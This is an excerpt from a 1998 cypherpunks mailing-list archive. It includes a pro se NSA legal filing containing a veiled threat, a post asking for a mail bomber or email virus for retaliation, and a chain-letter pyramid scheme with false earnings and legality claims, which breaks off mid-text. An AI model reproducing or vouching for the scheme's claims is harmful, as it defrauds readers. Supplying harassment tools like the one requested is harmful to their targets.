PEhSIFdJRFRIPSIxMDAlIj48L1REPg0KDQo8VEQ+PC9URD4NCjwvVFI+DQoN
CjxUUj4NCjxURD48L1REPg0KDQo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEgRGFpbHkgTmV3cyBmcm9tIFdP
Vy1DT00NCmlzIHRyYW5zbWl0dGVkIHdlZWtkYXlzLCBleGNlcHQgZm9yIGhv
bGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29ybGQgV2lkZQ0KV2ViIGF0IDxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lvbmFsIj5o
dHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4uJm5ic3A7
PC9GT05UPjwvRk9OVD4mbmJzcDsNCg0KPFA+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlvdSBhcmUgbm90IGludGVy
ZXN0ZWQNCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZyb20g
V09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIA10bw0KPEEgSFJFRj0i
bWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5j
b20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb208
L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7DQoNCjxQPjxCPioqKjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT4gVGhl
IHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5j
b20iDQptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlvbiBvZiB0aGUg
ZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOw0KDQo8UD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxlYXNl
IE5vdGU6IFNvbWUgb2YgdGhlDQpsaW5rcyBpbiB0b2RheSdzIG5ld3MgYXJl
IHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkgbm90IA1i
ZQ0KYXZhaWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRoZSBk
YXkuJm5ic3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzDQptYXkgYmUgc3Vi
c2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgDXJlZ2lzdHJhdGlvbi48L0ZP
TlQ+PC9GT05UPjwvVEQ+DQoNCjxURD48L1REPg0KPC9UUj4NCg0KPFRSPg0K
PFREPjwvVEQ+DQoNCjxURD4NCjxIUiBXSURUSD0iMTAwJSI+PC9URD4NCg0K
PFREPjwvVEQ+DQo8L1RSPg0KPC9UQUJMRT4NCiZuYnNwOzwvY2VudGVyPg0K
PC9CT0RZPg0KPC9IVE1MPg0K
--Boundary..3995.1071713794.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Han Solo <apocalipsisx@yahoo.com>
Date: Fri, 14 Aug 1998 16:00:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I am loooking for  a reply to a MAIL BOMBER
Message-ID: <19980814225948.4379.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

Some person that I know is sending me mail bombers, so I am looking
for a  virus mail or a powerfull mail bomber..

I tried with the  Kaboom,qz, etc....
I couldn't use the avalanche cos I don't have the dlls, but I want use
some powerfull mail bomber or a virus mail .

Plase help me cos this person is send me 1000 mails per day.....

Thank you






_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@extensis.com
Date: Fri, 14 Aug 1998 16:26:26 -0700 (PDT)
To: cypherpunks@toad.com (Cypher Punk)
Subject: Extensis Download Registration
Message-ID: <199808142326.QAA24523@us1.us.world.net>
MIME-Version: 1.0
Content-Type: text/plain




Dear Cypher,

Thank you for your interest in Extensis products! Please let us know if
there is anything we can do to help you get the most out of our products.
You can contact us at Info@extensis.com or by phone 503-274-2020.  
You can call us to place an order or you can order on-line or locate an 
Extensis reseller by visiting
http://www.extensis.com/purchase/

If you supervise or work with a group of creative professionals and are
interested in purchasing more than one copy of Extensis products, volume
discounts and site licenses are available for workgroups.  Call me for
details. Best regards,

Info@extensis.com
503-274-2020




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@extensis.com
Date: Fri, 14 Aug 1998 16:30:48 -0700 (PDT)
To: cypherpunks@toad.com (Cypher Punk)
Subject: Extensis Download Registration
Message-ID: <199808142330.QAA24746@us1.us.world.net>
MIME-Version: 1.0
Content-Type: text/plain




Dear Cypher,

Thank you for your interest in Extensis products! Please let us know if
there is anything we can do to help you get the most out of our products.
You can contact us at Info@extensis.com or by phone 503-274-2020.  
You can call us to place an order or you can order on-line or locate an 
Extensis reseller by visiting
http://www.extensis.com/purchase/

If you supervise or work with a group of creative professionals and are
interested in purchasing more than one copy of Extensis products, volume
discounts and site licenses are available for workgroups.  Call me for
details. Best regards,

Info@extensis.com
503-274-2020




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Aug 1998 14:31:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Internet Freedom Decision
Message-ID: <199808142131.RAA05279@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


John Gilmore calls attention to a recent US District Court decision
which affirms controversial publication on the Internet:

   This is a big deal; it is strong support for the idea that publications
   should remain visible on the Internet UNTIL a judge has declared
   them illegal.  Current practice of complainers is to try to get
   the material taken down immediately (typically by a service provider
   who's afraid to get sued), and then fight over whether to put it back!

   The case is in a defamation context, but might be applicable to the
   more common trademark/copyright/trade secret (e.g. scientology or
   domain name) censorship controversies.

   We should put the decision on the Web, and publicize the case.

-----

See the decision and ACLU press release on it:

   http://jya.com/sheehan.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 14 Aug 1998 08:58:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808141558.RAA31594@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


CLINTON/STARR SCRAMBLED 

Wed Aug 12 1998 23:34:51 UTC-- An extraordinary communications security
blanket will be in place
for President Clinton's grand jury showdown on Monday. One of the hottest
telecasts in American
history will be scrambled with the latest encryption technology and put on
a special fiber-optic
line from the White House to the courtroom, the DALLAS MORNING NEWS reports
in Thursday editions. 

Hacker beware: Intercepting the president's testimony could fall under
wiretapping statutes as a
felony, reports the paper. 

Tech workers, claiming to be from a Virginia cable company, visited the
federal courthouse early
week. One court watcher explains that the cover didn't work: "It was
obvious that the guys were not
with 'Virginia Cable' but were from the FBI or some other government
agency... setting it all up." 

Starr is expected to personally question Clinton during the session... 





"[T]errorists are the only true avant-garde artists because they're the
only ones who are still capable of really surprising people." (Delillo q.v.
Laurie Anderson 1994: 222) 	







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seabiner@aol.com
Date: Fri, 14 Aug 1998 16:21:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: LOL. Made me look
Message-ID: <35bbe962.35d4c650@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EpicTeU@aol.com
Date: Fri, 14 Aug 1998 17:06:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: VB 32 Bit Coders
Message-ID: <1f9dd40d.35d4d0de@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


VB 32 Bit Coders

about:
Hello,
I am trying to start a VB 32 bit code bank you can send any code you want to
exept codes for aol addons...  . 1nce a week most likely on fridays I will
check the hotmail account specifyed below and I will take all the codes and
put them in a txt file and send it to everyone who sent a code in since I am
working on a project useing winsock and Inet controls as alot of you may have
noticed I will be posting alot of Code for those two controls. 

How to Send:
To send Codes for the ML Send E-mail to VB32Coders@Hotmail.com 
In the sbject field write anonymous / Code topic if you don't want your E-Mail
address to show up when I send the Codes out or else just type the topic of
the code you are sending.. .

Next Issue:
I will be sending out the next code list on the 21st of this month So anyone
tha wants to be on this list has about a week to send in codes



 VB 32 BIT ML
 VB32Coders@Hotmail.com
   epiC   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EpicTeU@aol.com
Date: Fri, 14 Aug 1998 17:11:12 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Re: VB 32 Bit Coders (apoligy)
Message-ID: <5dab2074.35d4d1f5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I am sorry for sending this mail to the Cypherpunks list I made the same
mistake with bugtraq it wont happen again 
epiC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 14 Aug 1998 20:10:58 -0700 (PDT)
To: senator@wyden.senate.gov
Subject: FORUM web site
Message-ID: <35D4FB33.3FC1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 8/14/98 8:20 PM

John Young

My mind is working after our conversation a few minutes ago.

Morales and I seek to educate others to our experiences.

We will share documents on Internet.

Libertad help educated me.

Here is some of what Libertad said.

        Libertad is an underground organization.  Libertad has helped me
        more than any number of lawyers ever could.  Libertad enumerates
        the steps the government takes against whistleblowers.

                1       Do not investigate the complaint.
                2       Investigate complainer.
                3       Take action against complainer.
                4       Attempt to discredit complainer.   Ruin
                        complainer's
                        reputation and career.
                5       Attempt to drive complainer to suicide, divorce,
                        alcohol or drug abuse.
                6       Financially ruin the complainer through delay
                        another legal tactics.
                7       Enlist help of state delegation to destroy the
                        complainer.
                8       Improperly influence complainer's lawyer.
                9       Improperly influence judge.
                10      Load the jury.
                11      Hide behind classification.
                12      Seal the case to protect the government.

John Gowan 73710.141@compuserve.com and Max Hernandez are the major
forces behind THE UNDERGROUND ORGANIZATION Libertad.

Morales and my minds work SLOW when TRYING to decide what to do.

                   Sitting Bull, whose Indian name 
                   was Tatanka Iyotake, was born in 
                   the Grand River region of 
                   present-day South Dakota in 
                   approximately 1831. His nickname 
                   was Hunkesi, meaning "Slow" 
                   because he never hurried and did 
                   everything with care.  
 
http://www.incwell.com/Biographies/SittingBull.html 

We LABOR in THOUGHT over alternatives.  But then WE STRIKE.

Thank you so much for the Chrysler award nomination.
http://www.jya.com/chrysler98.htm

I am thinking SLOWLY about how we would put-together a FORUM web site
with documents which could be easily edited INTO FORMAL DOCUMENTS to
help others FIGHT THE GREAT SATAN.

Sitting Bull wrote in a statement I cannot find on the web, but read at
the Yellowstone museum in West Yellowstone, that THE main function of
senior citizens is  to educate the young.

bill
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

It has been over about 27 years since I directed any Ph.D. students

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html     
http://www.friction-free-economy.com/
http://www.mhpcc.edu/general/john.html


UNITED STATES COURT OF APPEALS    
       FOR THE TENTH CIRCUIT    
    
William H. Payne        	   	                     )    
Arthur R. Morales                                               )    
                                                                           )    
Appellants Plaintiffs,                                           )    
                                                                           )      98-2156 
v                                                                         )	98-2157    
					       )	    
Lieutenant General Kenneth A. Minihan, USAF )    
Director, National Security Agency	                     )    
National Security Agency		                     )    
                                                                            )    
Appellees Defendants                                           )    
  
RESPONSE TO MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS 
ADDRESSING JURISDICTIONAL ISSUES
 
1	COMES NOW appellant plaintiffs [Appellants - Plaintiffs] Payne [Payne] and Morales [Morales]     
    
pro se litigants to exercise their rights  guaranteed under the Constitution and Federal Rules of Appellate

Procedure http://www.ca5.uscourts.gov/docs/frap-iop.htm
 
  Any party may file a response in opposition to a motion other than one for procedural order
  [for which see subdivision (b)] within 7 days after service of the motion,  ...

http://www.ca5.uscourts.gov/docs/frap-iop.htm#27 
 
and
 
  FRAP 26c  Additional Time after Service. When a party is required or permitted to act within a prescribed    
  period after service of a paper upon that party, 3 calendar days are added to the prescribed period unless the     
  paper is delivered on the date of service  stated in the proof of service. 

http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c 
 
 MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS ADDRESSING 
JURISDICTIONAL ISSUES  [MOTION] was served on August 3, 1998 by Jan E Mitchell [Mitchell], 
Assistant US Attorney by mail.  Exhibit A.

2 Mitchell writes

  The Defendant-Appellee, National Security Agency [1], moves this Court for an Order extending the time
  to and including twenty-one (21) days following the date Plaintiffs-Appellants file their memorandum brief
  in which to file it memorandum briefs discussing jurisdictional issue in the above-referenced appeals. ...

    3.  Defendant-Appellee is not seeking an appeal and therefore, will NOT seek a certification for   
  interlocutory appeal from the District Court's memorandum Opinion and Order entered April 30, 1998, nor
  will Defendant-Appellee seek an order explicitly adjudicating all remaining claims.

    4.  On July 22, 1998, Plaintiffs-Appellants were granted an extension until September 1, 1998 to respond to   
  the Court's show cause orders of June 30, 1998.

    5 .  Defendant-Appellee seeks an additional twenty-one (21) days from the date in which Plaintiff's-
  Appellants' memorandum must be served in which to serve the memorandum briefs.  According to the Show 
  Cause Order, if Appellants do not seek and obtain a certification for interlocutory appeal or a final dispositive 
  adjudication concerning appeal N. 9821257, the appeal may be dismissed, in which case a jurisdictional brief 
  would not be required as to that appeal.  Should Plaintiffs-Appellants seek and obtain a certification for 
  interlocutory appeal pertaining to No. 2157, in the interest of economy, Defendant-Appellant seeks to file the 
  two memorandum briefs on the two very related jurisdictional issues at one time.

    6.  Undersigned counsel for Defendant-Appellee has contacted Plaintiff-Appellant William H. Payne who   
  has concurred on his own behalf and own behalf for Plaintiff-Appellant Arthur R. Morales in granting of this   
  motion. ...
 
3  Payne confirms 6 above in  fax

Monday 8/3/98 3:41 PM

  FAX

  Jan Elizabeth Mitchell
  Assistant U.S. Attorney
  U.S. Department of Justice
  United States Attorney
  District of New Mexico
  Post Office Box 607
  Albuquerque, NM 87103
  505/346-7274
  505/766-2868
  FAX 505/346-7205

  Dear Ms Mitchell:

  Purpose of the fax is to 

  1  review points covered in our 8/3/98 14:18 phone conversation
  2  suggest settlement.

  You phoned me today.

  You told me that you planned to file a motion or response to the Tenth circuit's
  request Morales and my response to the jurisdictional issue on the 21st of August.

  I told you that this was premature on your part since we had moved for a second time
  for an extension of time.

  I told you also that this matter was now before congress.

  You appeared to indicate to me that you were in the process of adding both Morales and
  Minihan as named parties in this appeal.

  You asked me if it would be agreeable to us if you filed a response to the Tenth circuit
  21 days AFTER Morales and I filed our response to the Tenth circuit on the jurisdictional
  issue.

  I AGREED.

  I spoke to Morales on the phone shortly after our phone conversation.

  Arguing points of law before court clerks and judges who have outstanding criminal complaint
  affidavits for crimes COMMITTED IN WRITING against them would be unproductive on Morales and my 
  part.

  Therefore, we will proceed to resolve the criminal conduct on the part of judges and court clerks
  before we proceed further in this matter.

  We will do this at the Congressional level.

  Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to properly process a valid
  complaint on New Mexico district court chief judge John Conway in 1995.  
  http://www.jya.com/whp071598.htm

  Hatch's failure to properly respond in 1995, in large part, caused our current legal conflict with DIR NSA 
  Minihan.

  We foresee an unfortunate escalation of hostilities if this matter proceeds as it is.  

  We do not wish this.

  We seek settlement of the UNFORTUNATE matter at the earliest time.

  We ask your and Congressional help to settle this UNFORTUNATE matter before it gets WORSE.

  If I have made any essential material errors in reporting my impression of the contents of our conversation, 
  then I would appreciate you giving your impression of possible errors.  

  You can do this in the letter you said you would write to us.

  Sincerely,


  bill payne
  13015 Calle de Sandias NE          	        
  Albuquerque, NM 87111              	        

  Distribution

  Senate Judiciary Committee   e-mail
  Arthur R Morales e-mail			

4  Michell responds to 3 in letter dated August 4, 1998.   Exhibit B

Mitchell writes

    I have received Mr. Payne's FAX dated August 3, 1998 at 4:22.  I want to clarify a few points. ...

    As to the caption of the appeal, I have noted in the motion for extension of time which has been filed with  
  the Tenth Circuit that there was an additional Defendant numbed in the District Court case.  However, I am 
  constrained at the time to use the caption which the Tenth Circuit is reflecting on its pleadings.

  I will forward your FAX suggesting settlement to Defendants.

				Sincerely,

				JOHN J. KELLY
				United States Attorney
				  signature
				JAN ELIZABETH MITCHELL
				Assistant U. S. Attorney


5  Federal Rules of Civil Procedure http://www.law.cornell.edu/rules/frcp/overview.htm  Rule 54(b) states

(b) Judgment Upon Multiple Claims or Involving Multiple Parties.

  When more than one claim for relief is presented in an action, whether as a claim, counterclaim, cross-claim,   
  or third-party claim, or when multiple parties are involved, the court may direct the entry of a final judgment 
  as to one or more but fewer than all of the claims or parties only upon an express determination that there is 
  no just reason for delay and upon an express direction for the entry of judgment. In the absence of such 
  determination and direction, any order or other form of decision, however designated, which adjudicates 
 fewer   than all the claims or the rights and liabilities of fewer than all the parties shall not terminate the   
 action as to  any of the claims or parties, and the order or other form of decision is subject to revision at any
  time before the entry of judgment adjudicating all the claims and the rights and liabilities of all the parties.

Interpretation of meaning of 54(b) is

  RULE 54(b) JUDGMENTS UPON MULTIPLE CLAIMS OR INVOLVING MULTIPLE PARTIES

  CORE CONCEPT
     A judgment entered as to less than all claims in a lawsuit, or as to less than all parties in a lawsuit,
  is not immediately appealable.  Instead, the appeal must generally await the entry of judgment as to all 
   remaining claims and parties.  However, the district court can make a judgment as to less than all claims or 
  parties "final", and thus immediately appeals, by expressly certifying that no just cause exists to delay the 
  appeal and by directing the entry of judgment.

  APPLICATIONS
     Prerequisites to Rule 54(b)

    There are three prerequisites for obtaining an immediately appealable judgment from the district court 
  entered as to less than all claims or parties.

  1:  Multiple Claims or Parties Fully Resolved:  To be eligible for immediate appeal under Rule 54(b), a   
  partial adjudication must either (a) finally resolve at least one claim or (b) finally resolve the rights and 
  liabilities of  at least one party.  A claim or a party's interest MUST be adjudicated to finality, such that there 
  is nothing more to do that claim or that party but await the conclusion of the remaining portion of the 
  litigation.  This limitation is a pivotal one.  Rule 54(b) does not alter the normal rules of appellate finality for 
  individuals claims, and no appeal may be taken from district court ruling or any particular claim until the 
  court finally resolves that claim.

  Multiple claims exist where each claim is factually separate and independent, or where each claim could be 
  enforced separately.

  2:  No just Cause for Delay:  The district court must state, in clear and unmistakable language, that there is  
  no just cause to delay the appeal of the adjudicated claim or the adjudicated right and liability of a party.  
  Whether "just cause" exists is a determination made on a case-by-case basis.  Certain criteria guide the 
  court's consideration:

  o  The relationship between adjudicated and unadjudicated claims;

  o  The possibility that the need for appellate review might be mooted by future developments in district court;

  o  The possibility that the district court might be obligated to consider the same issue on a later occasion;

  o  The presence (or absence) or a claim or counterclaim that could result in a set-off against the judgment 
  now sought to be made final and appealable; and

  o  Other factors, including delay, economic and solvency concerns, shortening of trial time, frivolity or 
  competing claims, and expense.

  3:  Entry of judgment:  In clear and unmistakable language, the district court must also direct that judgment   
  is entered as to that one claim or one party.

  Explanation by the District Court

    In its order entering a Rule 54(b) judgment, the district court must clearly explain why it has concluded that 
  an immediate appellate review of that order is advisable.

  Burden of Proof

    The moving party bears the burden of establishing that a partial judgment should be entered under Rule 
  54(b).

  Discretion of District Judge

    Whether to enter a judgment under Rule 54(b) is reserved to the sound discretion of the district judge.  Such    
  arguments are contrary to the historic federal policy against piecemeal appeals.  For this reason, Rule 54(b) 
  orders are not granted routinely or an accommodation to counsel.  Instead, the district court must carefully 
  balance the needs of the parties for an immediate appeal against the interests of efficient management of the 
  litigation.

   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
  initiative.

  Effects of Rule 54(b) Judgments

    Once entered, the time for appeal on the judgment begins to run, and does post-judgment interest.

  Appealability of Denials for Rule 54(b) Requests

    Allowing immediate appellate review of "partial" final judgments is a practice that departs from the federal
  courts' traditional opposition to piecemeal appeals.  Rule 54(b), thus, represents an unusual exception to this 
  settled policy.  Predictably, the court reject immediate attempt to challenge denials of Rule 54(b) judgments   
  as premature and unappealable until a final ruling his entered on the merits.

   Federal Civil Rules Handbook  1996, Baicker-McKee, Janssen, Corr, West Publishing Company

6  Appellants-Plaintiffs assert that there is NO REASON to seek a Rule 54 (b) certification for the 

REASON THAT New Mexico district judge Santiago Campos [Campos] already issued such certification.

FACT 1   4 May 1998  Campos writes

  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.


  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

 http://jya.com/whp043098.htm

1: [A] claim or a party's interest MUST be adjudicated to finality ... has been satisfied.

FACT 2   2:  is satisfed.   [N]o just Cause for Delay:  

Dismissing Minihan and Morales have nothing to do with the remaining claims of whether AppelleeS-

DefendantS Minihan and NSA provide lawfully requested documents on

	1  Iran messages given to Iraq during the Iraq/Iran war. http://www.aci.net/kalliste/speccoll.htm
	    http://caq.com/cryptogate
              2  Libyan message intercepted by the US
	3  deficient NSA cryptographic algorithms

FACT 3    3: In clear and unmistakable language, the district court must also direct that judgment   
                     is entered as to that one claim or one party.

  NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the NSA, 
  and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change.

  IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED.

   http://jya.com/whp043098.htm is QUITE CLEAR.

FACT 4   Motions for Rule 54(b) Judgments

    A party may file a motion with the court to certify under Rule 54(b), or the court may do so on its own 
    initiative.

Campos issues Rule 54(b) certification ON HIS OWN INITIATIVE.

     However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
     presentment of the classified Declaration or before taking any further action in this case.

FACT 5  Therefore, no Rule 54(b) certification needs to be sought by Appellants-Plaintiffs.

7  Campos did not explicitly state in Campos's June 29, 1998 letter http://jya.com/sec062998.htm

or in Campos' MEMORANDUM OPINION AND ORDER http://jya.com/whp043098.htm that a 

Rule 54(b) decision was issued.  Therefore, Appellants-Plaintiffs seek to clarify Campos intention
    
  Wednesday 8/12/98

  Certified   Return receipt requested 

  Santiago E. Campos, Senior Judge
  P.O. Box 2244
  U.S. Courthouse
  South Federal Place
  Santa Fe, NM 87504-2244

  Re: William H. Payne v. National Security Agency
  Civ. No. 97-0266 SC/DJS

  Dear Judge Campos,

  We assume that your statement

    However, I shall await decision on the appeals before the Tenth circuit prior to setting a date for   
    presentment of the classified Declaration or before taking any further action in this case.

 in your June 29, 1998 letter seen at http://jya.com/sec062998.htm is a sua sponte Rule 54(b) certification
 for immediate appeal.

  If we are incorrect in our assumption, then we ask that you write us and explain why we would need to 
  wait to appeal.

  Clearly we have satisfied the three conditions required for immediate appeal which we are sure you are
  acquainted.  

  If not, however,  these conditions are included  in Federal Civil Rules Handbook  1996, Baicker-McKee,   
  Janssen, Corr, West Publishing Company

  Also, we would ask that you justify seeking permission for appeal from a judge who has issued a  
  MEMORANDUM OPINION AND ORDER when appellants have satisfied Rule 54(b) conditions if you   
  choose to respond negative.

  If we do not hear from you Monday August 31, 1998, then we will treat our assumption as correct.

  Sincerely

  
  William H. Payne             	   	 Arthur R. Morales
  13015 Calle de Sandias NE          	               1024 Los Arboles NW
  Albuquerque, NM 87111              	 Albuquerque, NM 87107       
    
 8  Appellants-Plaintiffs receive   Exhibit C

  UNITED STATES COURT OF APPEALS 
  FOR THE TENTH CIRCUIT 
 
  WILLIAM H. PAYNE; ARTHUR R. 
  MORALES 
					Nos. 98-2156 
    	Plaintiff - Appellants,		        98-2157 
 
  NATIONAL SECURITY AGENCY, 
             Defendant - Appellee. 


                                ORDER
		Filed August 6, 1998

    The appellants and appellee are granted additional time until September 21, 1998
  to this court's show cause order of June 30, 1998.  All other requests contained in the
  appellants; motion filed August 4, 1998 are referred to the panel of judges who will hear
  this case on the merits.

			Entered for the Court
			PATRICK FISHER, Clerk of Court

			by: signature Randy Simmons?
  			Deputy Clerk

A  Hearing MUST be corrected to include defendant Minihan.

B  Clerk FISHER has not addressed his removal from the appeal for previous title 18 felony violations of

law.

C  ORDER does not address selection of three judge panel so not to include judges accused of Title 18 felony

violations of law or biased judges.

WHEREFORE    

9  CORRECT ORDER Filed August 6, 1998 to include NSA Director Minihan. for reason

              1  Find out who is RESPONSIBLE  
	2  Hold them ACCOUNTABLE 
	3  Hold them individually and their agency FINANCIALLY LIABLE   

Some may pay with their lives for http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  http://jya.com/whpfiles.htm  http://www.qainfo.se/~lb/crypto_ag.htm 
if this matter is NOT PEACEFULLY SETTLED.

10  EXPLICITLY RESPOND to request for removal of clerks FISHER and Hoecker from this appeal.

11  EXPLAIN how an unbiased panel of judges can be found at the Tenth circuit.

Respectfully submitted,    
        
   
                    William H. Payne             	   	        
                    13015 Calle de Sandias NE          	        
                    Albuquerque, NM 87111              	        
    
 			   
                       
                    Arthur R. Morales                               
                    1024 Los Arboles NW                            
                    Albuquerque, NM 87107                           
    
                    Pro se litigants    
    
    
               CERTIFICATE OF SERVICE    
    
I HEREBY CERTIFY that a copy of the foregoing response and motion   
was mailed to Lieutenant General Kenneth A. Minihan, USAF,    
Director,  National Security Agency, National Security Agency,    
9800 Savage Road, Fort George G. Meade, MD 20755-6000    
and mailed to Jan E Mitchell, Assistant US Attorney,    
9 Floor, Bank of America Building, 3rd and Tijeras, ABQ, NM 87102    
an original and three copies as required by FRAP 27(d)    
http://www.ca5.uscourts.gov/docs/frap-iop.htm#27d United States Court of    
Appeals for the Tenth Circuit, 1823 Stout Street, Denver, Co 80257 by CERTIFIED     
RETURN RECEIPT REQUESTED mail August 12, 1998.   




9






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 0ikg@aol.com
Date: Fri, 14 Aug 1998 22:52:04 -0700 (PDT)
To: prosperity@aol.com
Subject: Read Me Now
Message-ID: <199808150434.VAA02372@littonlcs.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi. If you received this letter by accident, there is no need to ask to be taken off the mailing list, as this letter will ONLY be sent to you ONCE.Thanks This is it folks.  This is the letter you've been reading about in the news lately.  Due to the 
popularity of this letter on the Internet, a major nightly news 
program recently devoted an entire show to the investigation of 
the program described below , to see if it really can make people 
money.  If you saw it, you know that their conclusion was that 
while most people did not make the $50,000 discussed in the plan, 
everyone who followed the instructions was able to make 100 to 
200 times their money at the very least. The show also 
investigated whether or not the program was legal. Their findings 
proved once and for all that there are absolutely no laws 
prohibiting the participation in the program.  This has helped to 
show people that this is a simple, harmless and fun way to make 
some extra money at home.  This is for real. I Actually Read a 
Piece of E-Mail & I HAVE NOW QUIT MY JOB!
  
Hello, my name is Bubba and now I will have to change my profile 
to " Retired", as I quit my job of 5 yrs. as Asst. Mgr. in auto 
sales. As a rule, I delete all unsolicited "junk" e-mail and use 
my account primarily for business.  I received what I assumed was 
this same e-mail countless times and deleted it each time. About 
two months ago I received it again and, because of the catchy 
subject line,  I finally read it.  Afterwards, I thought , "OK, I 
give in, I'm going to try this.  I can certainly afford to invest 
$20 and, on the other hand, there's nothing wrong with creating a 
little excess cash."  I promptly mailed four $5 bills and, after 
receiving the reports, paid a friend of mine a small fee to send 
out some e-mail advertisements for me. After reading the reports,
I also learned how easy it is to bulk e-mail for free!
     
I was not prepared for the results.  Everyday for the last six 
weeks, my P.O.box has been overflowing with $5 bills. I am 
stunned by all the money that keeps rolling in! I promise you, if 
you follow the directions in this e-mail and be prepared to
eventually set aside about an hour each day to follow up (and 
count your money!), you can make at least as much money as I did. 

You don't need to be a wiz at the computer, but I'll bet you 
already are. If you can open an envelope, remove the money, and 
send an e-mail message, then you're on your way to the bank.

Take the time to read this so you'll understand how easy it is. 
If I can do this, so can you!

                      GO FOR IT NOW!!    

PS: With the order of report # 1, I will send You some SIMPLE
instructions on how to follow the program effectively.           
The following is a copy of the e-mail I read:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEY-MAKING PHENOMENON. PRINT this letter, read the directions, THEN READ IT AGAIN !!!!!!!!!!!!!!!!!!!!!!  

You are about to embark on the most profitable and unique program 
you may ever see. Many times over, it has demonstrated and proven 
its ability to generate large amounts of cash.  This program is 
showing fantastic appeal with a huge and ever-growing on-line 
population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It does 
not require you to come in personal contact with people, do any 
hard work, and best of all, you never have to leave the house, 
except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!  Simply 
follow the easy instructions in this letter, and your financial 
dreams can come true! When followed correctly, this electronic, 
multi-level marketing program WORKS!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!
This is your chance, so don't pass it up! 

---------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC MULTI-LEVEL MARKETING 
PROGRAM
---------------------------------------------------------------

Basically, this is what we do: We send thousands of people a 
product that they paid us $5.00 US for, that costs next to 
nothing to produce and e-mail back to them. As with all multi-
level businesses, we build our business by recruiting new 
partners and selling our products.  Every state in the U.S. 
allows you to recruit new multi- level business online (via your 
computer).  We are not promising you anything.  You have to put 
forth some effort to make this business work, but come on how 
